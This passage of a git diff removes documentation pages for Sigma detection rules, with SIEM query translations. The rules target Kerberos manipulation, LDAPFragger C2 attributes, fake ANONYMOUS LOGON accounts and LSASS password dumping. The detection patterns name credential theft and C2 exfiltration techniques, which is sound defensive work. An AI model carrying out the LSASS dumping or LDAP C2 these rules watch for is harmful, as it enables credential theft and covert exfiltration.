-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"675\" OR \"4768\" OR \"4769\" OR \"4771\") AND winlog.event_data.FailureCode:(\"0x9\" OR \"0xA\" OR \"0xB\" OR \"0xF\" OR \"0x10\" OR \"0x11\" OR \"0x13\" OR \"0x14\" OR \"0x1A\" OR \"0x1F\" OR \"0x21\" OR \"0x22\" OR \"0x23\" OR \"0x24\" OR \"0x26\" OR \"0x27\" OR \"0x28\" OR \"0x29\" OR \"0x2C\" OR \"0x2D\" OR \"0x2E\" OR \"0x2F\" OR \"0x31\" OR \"0x32\" OR \"0x3E\" OR \"0x3F\" OR \"0x40\" OR \"0x41\" OR \"0x43\" OR \"0x44\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Kerberos Manipulation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("675" "4768" "4769" "4771") AND FailureCode:("0x9" "0xA" "0xB" "0xF" "0x10" "0x11" "0x13" "0x14" "0x1A" "0x1F" "0x21" "0x22" "0x23" "0x24" "0x26" "0x27" "0x28" "0x29" "0x2C" "0x2D" "0x2E" "0x2F" "0x31" "0x32" "0x3E" "0x3F" "0x40" "0x41" "0x43" "0x44"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="675" OR EventCode="4768" OR EventCode="4769" OR EventCode="4771") (FailureCode="0x9" OR FailureCode="0xA" OR FailureCode="0xB" OR FailureCode="0xF" OR FailureCode="0x10" OR FailureCode="0x11" OR FailureCode="0x13" OR FailureCode="0x14" OR FailureCode="0x1A" OR FailureCode="0x1F" OR FailureCode="0x21" OR FailureCode="0x22" OR FailureCode="0x23" OR FailureCode="0x24" OR FailureCode="0x26" OR FailureCode="0x27" OR FailureCode="0x28" OR FailureCode="0x29" OR FailureCode="0x2C" OR FailureCode="0x2D" OR FailureCode="0x2E" OR FailureCode="0x2F" OR FailureCode="0x31" OR FailureCode="0x32" OR FailureCode="0x3E" OR FailureCode="0x3F" OR FailureCode="0x40" OR FailureCode="0x41" OR FailureCode="0x43" OR FailureCode="0x44"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["675", "4768", "4769", "4771"] result_code IN ["0x9", "0xA", "0xB", "0xF", "0x10", "0x11", "0x13", "0x14", "0x1A", "0x1F", "0x21", "0x22", "0x23", "0x24", "0x26", "0x27", "0x28", "0x29", "0x2C", "0x2D", "0x2E", "0x2F", "0x31", "0x32", "0x3E", "0x3F", "0x40", "0x41", "0x43", "0x44"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*675|.*4768|.*4769|.*4771))(?=.*(?:.*0x9|.*0xA|.*0xB|.*0xF|.*0x10|.*0x11|.*0x13|.*0x14|.*0x1A|.*0x1F|.*0x21|.*0x22|.*0x23|.*0x24|.*0x26|.*0x27|.*0x28|.*0x29|.*0x2C|.*0x2D|.*0x2E|.*0x2F|.*0x31|.*0x32|.*0x3E|.*0x3F|.*0x40|.*0x41|.*0x43|.*0x44)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ldap_dataexchange.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ldap_dataexchange.md
deleted file mode 100644
index 5db68ac..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ldap_dataexchange.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious LDAP-Attributes Used       |
-|:-------------------------|:------------------|
-| **Description**          | detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1041: Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Companies, who may use these default LDAP-Attributes for personal information</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)</li><li>[https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)</li><li>[https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)</li></ul>  |
-| **Author**               | xknow @xknow_infosec |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious LDAP-Attributes Used
-id: d00a9a72-2c09-4459-ad03-5e0a23351e36
-description: detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
-status: experimental
-date: 2019/03/24
-author: xknow @xknow_infosec
-references:
-    - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
-    - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
-    - https://github.com/fox-it/LDAPFragger
-tags:
-    - attack.t1041
-    - attack.persistence
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5136
-        AttributeValue: '*'
-        AttributeLDAPDisplayName:
-            - 'primaryInternationalISDNNumber'
-            - 'otherFacsimileTelephoneNumber'
-            - 'primaryTelexNumber'
-    condition: selection
-falsepositives:
-    - Companies, who may use these default LDAP-Attributes for personal information
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5136" -and $_.message -match "AttributeValue.*.*" -and ($_.message -match "primaryInternationalISDNNumber" -or $_.message -match "otherFacsimileTelephoneNumber" -or $_.message -match "primaryTelexNumber")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5136" AND AttributeValue.keyword:* AND winlog.event_data.AttributeLDAPDisplayName:("primaryInternationalISDNNumber" OR "otherFacsimileTelephoneNumber" OR "primaryTelexNumber"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d00a9a72-2c09-4459-ad03-5e0a23351e36 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious LDAP-Attributes Used",
-    "description": "detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.",
-    "tags": [
-      "attack.t1041",
-      "attack.persistence"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5136\" AND AttributeValue.keyword:* AND winlog.event_data.AttributeLDAPDisplayName:(\"primaryInternationalISDNNumber\" OR \"otherFacsimileTelephoneNumber\" OR \"primaryTelexNumber\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5136\" AND AttributeValue.keyword:* AND winlog.event_data.AttributeLDAPDisplayName:(\"primaryInternationalISDNNumber\" OR \"otherFacsimileTelephoneNumber\" OR \"primaryTelexNumber\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious LDAP-Attributes Used'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" "otherFacsimileTelephoneNumber" "primaryTelexNumber"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5136" AttributeValue="*" (AttributeLDAPDisplayName="primaryInternationalISDNNumber" OR AttributeLDAPDisplayName="otherFacsimileTelephoneNumber" OR AttributeLDAPDisplayName="primaryTelexNumber"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5136" AttributeValue="*" AttributeLDAPDisplayName IN ["primaryInternationalISDNNumber", "otherFacsimileTelephoneNumber", "primaryTelexNumber"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5136)(?=.*.*)(?=.*(?:.*primaryInternationalISDNNumber|.*otherFacsimileTelephoneNumber|.*primaryTelexNumber)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_local_anon_logon_created.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_local_anon_logon_created.md
deleted file mode 100644
index 74e4008..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_local_anon_logon_created.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Suspicious Windows ANONYMOUS LOGON Local Account Created       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of suspicious accounts simliar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1136: Create Account](https://attack.mitre.org/techniques/T1136)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1189469425482829824](https://twitter.com/SBousseaden/status/1189469425482829824)</li></ul>  |
-| **Author**               | James Pemberton / @4A616D6573 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Windows ANONYMOUS LOGON Local Account Created
-id: 1bbf25b9-8038-4154-a50b-118f2a32be27
-status: experimental
-description: Detects the creation of suspicious accounts simliar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
-references:
-    - https://twitter.com/SBousseaden/status/1189469425482829824
-author: James Pemberton / @4A616D6573
-date: 2019/10/31
-tags:
-    - attack.persistence
-    - attack.t1136
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4720
-        SAMAccountName: '*ANONYMOUS*LOGON*'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4720" -and $_.message -match "SAMAccountName.*.*ANONYMOUS.*LOGON.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4720" AND SAMAccountName.keyword:*ANONYMOUS*LOGON*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1bbf25b9-8038-4154-a50b-118f2a32be27 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created",
-    "description": "Detects the creation of suspicious accounts simliar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1136"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4720\" AND SAMAccountName.keyword:*ANONYMOUS*LOGON*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4720\" AND SAMAccountName.keyword:*ANONYMOUS*LOGON*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Windows ANONYMOUS LOGON Local Account Created'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4720" AND SAMAccountName.keyword:*ANONYMOUS*LOGON*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4720" SAMAccountName="*ANONYMOUS*LOGON*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4720" SAMAccountName="*ANONYMOUS*LOGON*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4720)(?=.*.*ANONYMOUS.*LOGON.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump.md
deleted file mode 100644
index f67e5e9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Password Dumper Activity on LSASS       |
-|:-------------------------|:------------------|
-| **Description**          | Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/jackcr/status/807385668833968128](https://twitter.com/jackcr/status/807385668833968128)</li></ul>  |
-| **Author**               |  Author of this Detection Rule haven't introduced himself  |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Password Dumper Activity on LSASS
-id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c
-description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
-status: experimental
-date: 2017/02/12
-references:
-    - https://twitter.com/jackcr/status/807385668833968128
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.001
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4656
-        ProcessName: 'C:\Windows\System32\lsass.exe'
-        AccessMask: '0x705'
-        ObjectType: 'SAM_DOMAIN'
-    condition: selection
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4656" -and $_.message -match "ProcessName.*C:\\Windows\\System32\\lsass.exe" -and $_.message -match "AccessMask.*0x705" -and $_.message -match "ObjectType.*SAM_DOMAIN") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4656" AND winlog.event_data.ProcessName:"C\:\\Windows\\System32\\lsass.exe" AND winlog.event_data.AccessMask:"0x705" AND winlog.event_data.ObjectType:"SAM_DOMAIN")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c <<EOF
-{
-  "metadata": {
-    "title": "Password Dumper Activity on LSASS",
-    "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\lsass.exe\" AND winlog.event_data.AccessMask:\"0x705\" AND winlog.event_data.ObjectType:\"SAM_DOMAIN\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4656\" AND winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\lsass.exe\" AND winlog.event_data.AccessMask:\"0x705\" AND winlog.event_data.ObjectType:\"SAM_DOMAIN\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Password Dumper Activity on LSASS'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4656" AND ProcessName:"C\:\\Windows\\System32\\lsass.exe" AND AccessMask:"0x705" AND ObjectType:"SAM_DOMAIN")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4656" ProcessName="C:\\Windows\\System32\\lsass.exe" AccessMask="0x705" ObjectType="SAM_DOMAIN")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4656" ProcessName="C:\\Windows\\System32\\lsass.exe" AccessMask="0x705" ObjectType="SAM_DOMAIN")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4656)(?=.*C:\Windows\System32\lsass\.exe)(?=.*0x705)(?=.*SAM_DOMAIN))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump_generic.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump_generic.md
deleted file mode 100644
index f84a8a8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_lsass_dump_generic.md
+++ /dev/null
@@ -1,215 +0,0 @@
-| Title                    | Generic Password Dumper Activity on LSASS       |
-|:-------------------------|:------------------|
-| **Description**          | Detects process handle on LSASS process with certain access mask |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html](https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html)</li><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) |
-| Other Tags           | <ul><li>car.2019-04-004</li><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Generic Password Dumper Activity on LSASS
-id: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76
-description: Detects process handle on LSASS process with certain access mask
-status: experimental
-author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
-date: 2019/11/01
-modified: 2019/11/07
-references:
-    - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - car.2019-04-004
-    - attack.t1003.001
-logsource:
-    product: windows
-    service: security
-detection:
-    selection_1:
-        EventID: 4656
-        ObjectName|endswith: '\lsass.exe'
-        AccessMask|contains:
-            - '0x40'
-            - '0x1400'
-            - '0x1000'
-            - '0x100000'
-            - '0x1410'    # car.2019-04-004
-            - '0x1010'    # car.2019-04-004
-            - '0x1438'    # car.2019-04-004
-            - '0x143a'    # car.2019-04-004
-            - '0x1418'    # car.2019-04-004
-            - '0x1f0fff'
-            - '0x1f1fff'
-            - '0x1f2fff'
-            - '0x1f3fff'
-    selection_2:
-        EventID: 4663
-        ObjectName|endswith: '\lsass.exe'
-        AccessList|contains:
-            - '4484'
-            - '4416'
-    filter:
-        ProcessName|endswith:
-            - '\wmiprvse.exe'
-            - '\taskmgr.exe'
-            - '\procexp64.exe'
-            - '\procexp.exe'
-            - '\lsm.exe'
-            - '\csrss.exe'
-            - '\wininit.exe'
-            - '\vmtoolsd.exe'
-    condition: selection_1 or selection_2 and not filter
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-    - ProcessName
-    - ProcessID
-falsepositives:
-    - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "4656" -and $_.message -match "ObjectName.*.*\\lsass.exe" -and ($_.message -match "AccessMask.*.*0x40.*" -or $_.message -match "AccessMask.*.*0x1400.*" -or $_.message -match "AccessMask.*.*0x1000.*" -or $_.message -match "AccessMask.*.*0x100000.*" -or $_.message -match "AccessMask.*.*0x1410.*" -or $_.message -match "AccessMask.*.*0x1010.*" -or $_.message -match "AccessMask.*.*0x1438.*" -or $_.message -match "AccessMask.*.*0x143a.*" -or $_.message -match "AccessMask.*.*0x1418.*" -or $_.message -match "AccessMask.*.*0x1f0fff.*" -or $_.message -match "AccessMask.*.*0x1f1fff.*" -or $_.message -match "AccessMask.*.*0x1f2fff.*" -or $_.message -match "AccessMask.*.*0x1f3fff.*")) -or (($_.ID -eq "4663" -and $_.message -match "ObjectName.*.*\\lsass.exe" -and ($_.message -match "AccessList.*.*4484.*" -or $_.message -match "AccessList.*.*4416.*")) -and  -not (($_.message -match "ProcessName.*.*\\wmiprvse.exe" -or $_.message -match "ProcessName.*.*\\taskmgr.exe" -or $_.message -match "ProcessName.*.*\\procexp64.exe" -or $_.message -match "ProcessName.*.*\\procexp.exe" -or $_.message -match "ProcessName.*.*\\lsm.exe" -or $_.message -match "ProcessName.*.*\\csrss.exe" -or $_.message -match "ProcessName.*.*\\wininit.exe" -or $_.message -match "ProcessName.*.*\\vmtoolsd.exe"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:"4656" AND winlog.event_data.ObjectName.keyword:*\\lsass.exe AND winlog.event_data.AccessMask.keyword:(*0x40* OR *0x1400* OR *0x1000* OR *0x100000* OR *0x1410* OR *0x1010* OR *0x1438* OR *0x143a* OR *0x1418* OR *0x1f0fff* OR *0x1f1fff* OR *0x1f2fff* OR *0x1f3fff*)) OR ((winlog.event_id:"4663" AND winlog.event_data.ObjectName.keyword:*\\lsass.exe AND AccessList.keyword:(*4484* OR *4416*)) AND (NOT (winlog.event_data.ProcessName.keyword:(*\\wmiprvse.exe OR *\\taskmgr.exe OR *\\procexp64.exe OR *\\procexp.exe OR *\\lsm.exe OR *\\csrss.exe OR *\\wininit.exe OR *\\vmtoolsd.exe))))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76 <<EOF
-{
-  "metadata": {
-    "title": "Generic Password Dumper Activity on LSASS",
-    "description": "Detects process handle on LSASS process with certain access mask",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "car.2019-04-004",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4656\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe AND winlog.event_data.AccessMask.keyword:(*0x40* OR *0x1400* OR *0x1000* OR *0x100000* OR *0x1410* OR *0x1010* OR *0x1438* OR *0x143a* OR *0x1418* OR *0x1f0fff* OR *0x1f1fff* OR *0x1f2fff* OR *0x1f3fff*)) OR ((winlog.event_id:\"4663\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe AND AccessList.keyword:(*4484* OR *4416*)) AND (NOT (winlog.event_data.ProcessName.keyword:(*\\\\wmiprvse.exe OR *\\\\taskmgr.exe OR *\\\\procexp64.exe OR *\\\\procexp.exe OR *\\\\lsm.exe OR *\\\\csrss.exe OR *\\\\wininit.exe OR *\\\\vmtoolsd.exe))))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4656\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe AND winlog.event_data.AccessMask.keyword:(*0x40* OR *0x1400* OR *0x1000* OR *0x100000* OR *0x1410* OR *0x1010* OR *0x1438* OR *0x143a* OR *0x1418* OR *0x1f0fff* OR *0x1f1fff* OR *0x1f2fff* OR *0x1f3fff*)) OR ((winlog.event_id:\"4663\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe AND AccessList.keyword:(*4484* OR *4416*)) AND (NOT (winlog.event_data.ProcessName.keyword:(*\\\\wmiprvse.exe OR *\\\\taskmgr.exe OR *\\\\procexp64.exe OR *\\\\procexp.exe OR *\\\\lsm.exe OR *\\\\csrss.exe OR *\\\\wininit.exe OR *\\\\vmtoolsd.exe))))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Generic Password Dumper Activity on LSASS'",
